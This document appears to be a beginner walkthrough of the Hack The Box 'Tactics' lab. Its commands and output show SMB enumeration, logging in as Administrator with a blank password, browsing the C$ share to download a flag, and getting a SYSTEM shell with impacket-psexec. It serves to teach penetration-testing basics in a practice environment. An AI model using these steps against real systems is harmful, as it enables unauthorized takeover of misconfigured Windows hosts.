The aim of this walkthrough is to provide help with the Tactics machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

TASK 1

Question: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?

We start out with a quick connection test.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ ping $rhost -c 4
PING 10.129.118.218 (10.129.118.218) 56(84) bytes of data.
64 bytes from 10.129.118.218: icmp_seq=1 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=2 ttl=127 time=10.4 ms
64 bytes from 10.129.118.218: icmp_seq=3 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=4 ttl=127 time=10.6 ms

--- 10.129.118.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 10.392/10.645/10.836/0.174 ms
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Running nmap without any options does not work, but it does in fact gives us a hint.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:18 BST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

So let’s try it.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap -Pn $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:21 BST
Nmap scan report for 10.129.118.218
Host is up (0.013s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Three (top) ports appear to be open: 135, 139 and 445.

Let’s check these reported services for some more information.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap -p135,139,445 -Pn -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:38 BST
Nmap scan report for 10.129.118.218
Host is up (0.012s latency).

PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-05-10T21:38:14
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

-Pn

TASK 2

Question: What does the 3-letter acronym SMB stand for?

A quick online search can do wonders…

server message block

TASK 3

Question: What port does SMB use to operate at?

Online research, just like in the previous task.

445

TASK 4

Question: What command line argument do you give to `smbclient` to list available shares?

Using the command’s built-in help option should gives us a hand here.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
...
  -L, --list=HOST                              Get a list of shares available on a host
...

Trying out the default Administrator account and hoping that it is misconfigured (without any password) does not disappoint.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient -L $rhost -U Administrator
Password for [WORKGROUP\Administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ 

Three shares are listed on our target machine.

-L

TASK 5

Question: What character at the end of a share name indicates it's an administrative share?

Looking at the reported shares from TASK4, it must be $. But let’s try and access the shares:

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient //$rhost/ADMIN$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Sep 20 17:02:48 2021
  ..                                  D        0  Mon Sep 20 17:02:48 2021
  $Reconfig$                          D        0  Mon Sep 20 17:02:49 2021
  ADFS                                D        0  Sat Sep 15 08:19:03 2018
  appcompat                           D        0  Sat Sep 15 08:19:00 2018
  apppatch                            D        0  Mon Oct 29 22:39:47 2018
  AppReadiness                        D        0  Wed Apr 21 16:39:36 2021
  assembly                           DR        0  Sat Sep 15 10:09:13 2018
  bcastdvr                            D        0  Sat Sep 15 08:19:00 2018
  bfsvc.exe                           A    78848  Sat Sep 15 08:12:58 2018
  Boot                                D        0  Sat Sep 15 08:19:01 2018
  bootstat.dat                       AS    67584  Wed May 10 22:15:58 2023
  Branding                            D        0  Sat Sep 15 08:19:01 2018
  CbsTemp                             D        0  Wed Jul  7 19:00:03 2021
  Containers                          D        0  Sat Sep 15 08:19:01 2018
  Cursors                             D        0  Sat Sep 15 08:19:04 2018
  debug                               D        0  Wed Apr 21 16:17:15 2021
  diagnostics                         D        0  Sat Sep 15 08:19:01 2018
  DigitalLocker                       D        0  Sat Sep 15 10:05:40 2018
  Downloaded Program Files           DS        0  Sat Sep 15 08:19:04 2018
  drivers                             D        0  Sat Sep 15 08:19:01 2018
  DtcInstall.log                      A     1947  Wed Apr 21 16:16:44 2021
  ELAMBKUP                           DH        0  Sat Sep 15 08:19:04 2018
  en-US                               D        0  Sat Sep 15 10:05:40 2018
  explorer.exe                        A  4245280  Mon Oct 29 22:39:24 2018
  Fonts                             DSR        0  Sat Sep 15 08:19:04 2018
  Globalization                       D        0  Sat Sep 15 08:19:01 2018
  Help                                D        0  Sat Sep 15 10:05:40 2018
  HelpPane.exe                        A  1065472  Sat Sep 15 08:12:46 2018
  hh.exe                              A    18432  Sat Sep 15 08:12:48 2018
  IdentityCRL                         D        0  Sat Sep 15 08:19:04 2018
  IME                                 D        0  Sat Sep 15 10:05:40 2018
  ImmersiveControlPanel              DR        0  Wed Apr 21 16:16:42 2021
  INF                                 D        0  Wed May 10 22:09:44 2023
  InputMethod                         D        0  Sat Sep 15 08:19:01 2018
  Installer                         DHS        0  Wed Jul  7 19:05:00 2021
  L2Schemas                           D        0  Sat Sep 15 08:19:04 2018
  LiveKernelReports                   D        0  Sat Sep 15 08:19:01 2018
  Logs                                D        0  Tue Sep 21 17:33:25 2021
  lsasetup.log                        A     1380  Wed Apr 21 16:16:02 2021
  media                             DSR        0  Sat Sep 15 08:19:04 2018
  mib.bin                             A    43131  Sat Sep 15 08:12:40 2018
  Microsoft.NET                      DR        0  Wed May 10 22:15:59 2023
  Migration                           D        0  Sat Sep 15 08:19:01 2018
  ModemLogs                           D        0  Sat Sep 15 08:19:01 2018
  notepad.exe                         A   254464  Sat Sep 15 08:12:38 2018
  OCR                                 D        0  Sat Sep 15 10:07:04 2018
  Offline Web Pages                  DR        0  Sat Sep 15 08:19:05 2018
  Panther                             D        0  Wed Apr 21 16:16:50 2021
  Performance                         D        0  Sat Sep 15 08:19:01 2018
  PFRO.log                            A     1708  Mon Sep 27 11:26:45 2021
  PLA                                 D        0  Sat Sep 15 08:19:01 2018
  PolicyDefinitions                   D        0  Sat Sep 15 10:08:05 2018
  Prefetch                           Dn        0  Wed Apr 21 16:16:20 2021
  PrintDialog                        DR        0  Wed Apr 21 16:16:43 2021
  Provisioning                        D        0  Sat Sep 15 08:19:01 2018
  regedit.exe                         A   358400  Sat Sep 15 08:12:52 2018
  Registration                        D        0  Wed May 10 22:05:37 2023
  RemotePackages                      D        0  Sat Sep 15 08:19:01 2018
  rescache                            D        0  Sat Sep 15 08:19:01 2018
  Resources                           D        0  Sat Sep 15 08:19:01 2018
  SchCache                            D        0  Sat Sep 15 08:19:01 2018
  schemas                             D        0  Sat Sep 15 08:19:01 2018
  security                            D        0  Sat Sep 15 08:19:01 2018
  ServerStandard.xml                  A    30931  Sat Sep 15 08:13:27 2018
  ServiceProfiles                     D        0  Wed Apr 21 16:16:04 2021
  ServiceState                        D        0  Sat Sep 15 08:19:01 2018
  servicing                           D        0  Sat Sep 15 10:06:36 2018
  Setup                               D        0  Sat Sep 15 08:21:38 2018
  ShellComponents                     D        0  Sat Sep 15 08:19:05 2018
  ShellExperiences                    D        0  Sat Sep 15 08:19:05 2018
  SKB                                 D        0  Sat Sep 15 08:19:01 2018
  SoftwareDistribution                D        0  Wed Apr 21 16:23:54 2021
  Speech                              D        0  Sat Sep 15 08:19:01 2018
  Speech_OneCore                      D        0  Sat Sep 15 08:19:01 2018
  splwow64.exe                        A   132096  Sat Sep 15 08:13:30 2018
  System                              D        0  Sat Sep 15 08:19:01 2018
  system.ini                          A      219  Sat Sep 15 08:16:48 2018
  System32                            D        0  Wed May 10 22:09:44 2023
  SystemApps                          D        0  Sat Sep 15 08:19:01 2018
  SystemResources                     D        0  Sat Sep 15 08:19:01 2018
  SysWOW64                            D        0  Wed Jul  7 19:04:43 2021
  TAPI                                D        0  Tue Sep 21 17:51:49 2021
  Tasks                               D        0  Wed Apr 21 16:16:18 2021
  Temp                                D        0  Wed May 10 22:16:17 2023
  TextInput                           D        0  Sat Sep 15 08:19:14 2018
  tracing                             D        0  Sat Sep 15 08:19:01 2018
  twain_32                            D        0  Sat Sep 15 08:19:14 2018
  twain_32.dll                        A    64512  Sat Sep 15 08:13:11 2018
  Vss                                 D        0  Sat Sep 15 08:19:01 2018
  WaaS                                D        0  Sat Sep 15 08:19:01 2018
  Web                                 D        0  Sat Sep 15 08:19:01 2018
  win.ini                             A       92  Sat Sep 15 08:16:48 2018
  WindowsShell.Manifest             AHR      670  Sat Sep 15 08:12:40 2018
  WindowsUpdate.log                   A      276  Wed May 10 22:05:41 2023
  winhlp32.exe                        A    11776  Sat Sep 15 08:13:11 2018
  WinSxS                              D        0  Wed Jul  7 18:46:29 2021
  WMSysPr9.prx                        A   316640  Sat Sep 15 08:12:02 2018
  write.exe                           A    11264  Sat Sep 15 08:12:55 2018

		3774463 blocks of size 4096. 1156502 blocks available
smb: \> pwd
Current directory is \\10.129.118.218\ADMIN$\
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

It looks like the ADMIN$ share contains the Windows system files. How about the other two?

We get lucky once we look around the C$ share. We find the final flag, located at - \\$rhost\C$\Users\Administrator\Desktop\flag.txt -, so we download it to our local machine.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient //$rhost/C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Wed Apr 21 16:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 19:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 16:17:12 2021
  pagefile.sys                      AHS 738197504  Wed May 10 22:05:32 2023
  PerfLogs                            D        0  Sat Sep 15 08:19:00 2018
  Program Files                      DR        0  Wed Jul  7 19:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 19:03:38 2021
  ProgramData                        DH        0  Tue Sep 13 17:27:53 2022
  Recovery                         DHSn        0  Wed Apr 21 16:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 16:34:04 2021
  Users                              DR        0  Wed Apr 21 16:23:18 2021
  Windows                             D        0  Wed Jul  7 19:05:23 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \> cd Users
smb: \Users\> ls
  .                                  DR        0  Wed Apr 21 16:23:18 2021
  ..                                 DR        0  Wed Apr 21 16:23:18 2021
  Administrator                       D        0  Wed Apr 21 16:23:32 2021
  All Users                       DHSrn        0  Sat Sep 15 08:28:48 2018
  Default                           DHR        0  Wed Apr 21 16:17:12 2021
  Default User                    DHSrn        0  Sat Sep 15 08:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 08:16:48 2018
  Public                             DR        0  Wed Apr 21 16:23:31 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\> cd Administrator
smb: \Users\Administrator\> ls
  .                                   D        0  Wed Apr 21 16:23:32 2021
  ..                                  D        0  Wed Apr 21 16:23:32 2021
  3D Objects                         DR        0  Wed Apr 21 16:23:31 2021
  AppData                            DH        0  Wed Apr 21 16:23:19 2021
  Application Data                DHSrn        0  Wed Apr 21 16:23:19 2021
  Contacts                           DR        0  Wed Apr 21 16:23:31 2021
  Cookies                         DHSrn        0  Wed Apr 21 16:23:19 2021
  Desktop                            DR        0  Thu Apr 22 08:16:03 2021
  Documents                          DR        0  Wed Apr 21 16:23:32 2021
  Downloads                          DR        0  Wed Jul  7 18:44:36 2021
  Favorites                          DR        0  Wed Apr 21 16:23:31 2021
  Links                              DR        0  Wed Apr 21 16:23:32 2021
  Local Settings                  DHSrn        0  Wed Apr 21 16:23:19 2021
  Music                              DR        0  Wed Apr 21 16:23:32 2021
  My Documents                    DHSrn        0  Wed Apr 21 16:23:19 2021
  NetHood                         DHSrn        0  Wed Apr 21 16:23:19 2021
  NTUSER.DAT                        AHn   786432  Tue Sep 13 17:29:05 2022
  ntuser.dat.LOG1                   AHS    65536  Wed Apr 21 16:23:18 2021
  ntuser.dat.LOG2                   AHS   238592  Wed Apr 21 16:23:18 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf    AHS    65536  Wed Apr 21 10:03:39 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Wed Apr 21 16:23:19 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Wed Apr 21 16:23:19 2021
  ntuser.ini                         HS       20  Wed Apr 21 16:23:19 2021
  Pictures                           DR        0  Wed Apr 21 16:23:31 2021
  PrintHood                       DHSrn        0  Wed Apr 21 16:23:19 2021
  Recent                          DHSrn        0  Wed Apr 21 16:23:19 2021
  Saved Games                        DR        0  Wed Apr 21 16:23:32 2021
  Searches                           DR        0  Wed Apr 21 16:23:32 2021
  SendTo                          DHSrn        0  Wed Apr 21 16:23:19 2021
  Start Menu                      DHSrn        0  Wed Apr 21 16:23:19 2021
  Templates                       DHSrn        0  Wed Apr 21 16:23:19 2021
  Videos                             DR        0  Wed Apr 21 16:23:31 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Thu Apr 22 08:16:03 2021
  ..                                 DR        0  Thu Apr 22 08:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 16:23:32 2021
  flag.txt                            A       32  Fri Apr 23 10:39:00 2021

		3774463 blocks of size 4096. 1156502 blocks available             
smb: \Users\Administrator\Desktop\> pwd
Current directory is \\10.129.118.218\C$\Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

$

TASK 6

Question: Which Administrative share is accessible on the box that allows users to view the whole file system?

The answer should be quite simple since we used the same exact share in TASK5 to download our flag file.

C$

TASK 7

Question: What command can we use to download the files we find on the SMB Share?

Again, we used the same command to download the flag file in TASK5.

get

TASK 8

Question: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

Optionally, we could use impacket's psecec tool to spawn a shell in the ADMIN$ share. Then accessing the flag after we located it becomes quite simple.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.129.118.218.....
[*] Found writable share ADMIN$
[*] Uploading file qbvrkWIQ.exe
[*] Opening SVCManager on 10.129.118.218.....
[*] Creating service UNVK on 10.129.118.218.....
[*] Starting service UNVK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd ..

C:\Windows>cd \Users\ 

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is EEE0-FCDB

 Directory of C:\Users\Administrator\Desktop

04/22/2021  12:16 AM    <DIR>          .
04/22/2021  12:16 AM    <DIR>          ..
04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes
               2 Dir(s)   4,736,704,512 bytes free

C:\Users\Administrator\Desktop>type flag.txt
<flag>
C:\Users\Administrator\Desktop>

psexec.py

SUBMIT FLAG

Question: Submit root flag

Simply grabbing the downloaded flag file from TASK5 should do it.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ cat flag.txt 
<flag>
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Optionally, we could use impacket's psecec tool as we did in TASK8.

flag

Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!